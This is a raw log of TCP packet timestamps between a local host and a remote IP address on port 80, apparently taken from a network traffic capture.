                                                                    Dec 18, 2024 09:13:06.618613958 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.618648052 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.619515896 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.619580030 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.619635105 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.620415926 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.620488882 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.620492935 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.621315956 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.621426105 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.621627092 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.622227907 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.622288942 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.622337103 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.623171091 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.623228073 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.623260975 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.624106884 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.624161959 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.624239922 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.625031948 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.625091076 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.625128031 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.625931978 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.626008987 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.626050949 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.626851082 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.626903057 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.626986980 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.627975941 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.628027916 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.628123999 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.628809929 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.628859997 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.629005909 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.629698992 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.629750967 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.629968882 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.630578041 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.630625963 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.630796909 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.631526947 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.631577015 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.631649971 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.632483959 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.632529974 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.632535934 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.633337975 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.633388996 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.633404016 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.634258032 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.634313107 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.634387016 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.635166883 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.635224104 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.635298014 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.636106968 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.636151075 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.636245966 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.637033939 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.637083054 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.637129068 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.638051987 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.638104916 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.638159990 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.638976097 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.639029980 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.639055967 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.639800072 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.639848948 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.714339972 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.714448929 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.714500904 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.714801073 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.714900017 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.714955091 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.715739012 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.715841055 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.716022968 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.716631889 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.716759920 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.716814995 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.717582941 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.717706919 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.717760086 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.718595028 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.718689919 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.718789101 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.719456911 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.719510078 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.719571114 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.754888058 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.754986048 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.755078077 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.755178928 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.755243063 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.755299091 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.756100893 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.756175041 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.756220102 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.756792068 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.756901026 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.756948948 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.757721901 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.757822990 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.758637905 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.758692980 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.758707047 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.759287119 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.759577990 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.759668112 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.760071039 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.760468960 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.795391083 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.795418024 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.795492887 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.795566082 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.795655012 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.795701027 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.799240112 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.799259901 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.799320936 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.799379110 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.799402952 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.799420118 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.799422979 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.799436092 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.799453020 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.799463034 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.799500942 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.800220013 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.800390959 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.800482035 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.801316977 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.801332951 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.801376104 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.802105904 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.802282095 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.802330971 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.802989006 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.803167105 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.803217888 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.804028034 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.804044008 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.804105997 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.804838896 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.804856062 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.804903030 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.805747032 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.805953026 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.806777954 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.806802034 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.806830883 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.806852102 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.807554007 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.807714939 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.807764053 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.808506012 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.808522940 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.808577061 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.809473038 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.809659958 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.809708118 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.810427904 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.810453892 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.811415911 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.811431885 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.811467886 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.811490059 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.812211037 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.812376022 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.812429905 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.813231945 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.813249111 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.813291073 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.814088106 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.814258099 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.814941883 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.814995050 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.815108061 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.816067934 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.816082954 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.816097021 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.816126108 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.816765070 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.816950083 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.817007065 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.817873955 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.817890882 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.817956924 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.818677902 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.818851948 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.819668055 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.819684029 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:06.819721937 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.819750071 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:06.820487022 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.184904099 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.185657978 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.185722113 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.186275005 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.186839104 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.186855078 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.186888933 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.187567949 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.187592030 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.187612057 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.188397884 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.188442945 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.188636065 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.189457893 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.189474106 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.189511061 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.190315962 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.190335989 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.190395117 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.191337109 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.191360950 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.191397905 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.192236900 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.192253113 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.192282915 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.193118095 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.193134069 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.193173885 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.194199085 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.194214106 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.194262981 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.194998980 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.195014954 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.195065975 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.195904970 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.195919991 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.195952892 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.196867943 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.196883917 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.196937084 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.197782993 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.197798967 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.197837114 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.198657990 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.198717117 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.198725939 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.199645042 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.199661970 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.199706078 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.200885057 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.200938940 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.200959921 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.201479912 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.201494932 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.201545954 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.202326059 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.202445030 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.202508926 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.203360081 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.203375101 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.203423023 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.204211950 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.204262018 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.204272032 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.205128908 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.205173969 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.205177069 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.206084967 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.206099987 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.206151009 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.206974983 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.207050085 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.207058907 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.207945108 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.207959890 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.208007097 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.208795071 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.208954096 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.209036112 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.209748983 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.209801912 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.209804058 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.210638046 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.210700035 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.210756063 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.211544037 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.211592913 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.211632967 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.212486029 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.212547064 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.212549925 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.213457108 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.213704109 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.287847996 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.287870884 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.287940025 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.288043022 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.288237095 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.288285017 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.288619041 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.288671017 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.288788080 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.289505005 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.289652109 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.289709091 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.290448904 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.290662050 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.290723085 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.291357040 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.291479111 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.291528940 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.292345047 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.292570114 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.292625904 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.293240070 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.329010963 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.329066038 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.329088926 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.329442024 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.329529047 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.329572916 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.330363989 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.330424070 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.330482960 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.331279039 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.331331015 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.331331968 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.332245111 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.332293987 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.332468033 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.333221912 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.333239079 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.333271027 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.334099054 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.334161997 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.334201097 CET8049707147.45.49.155192.168.2.5
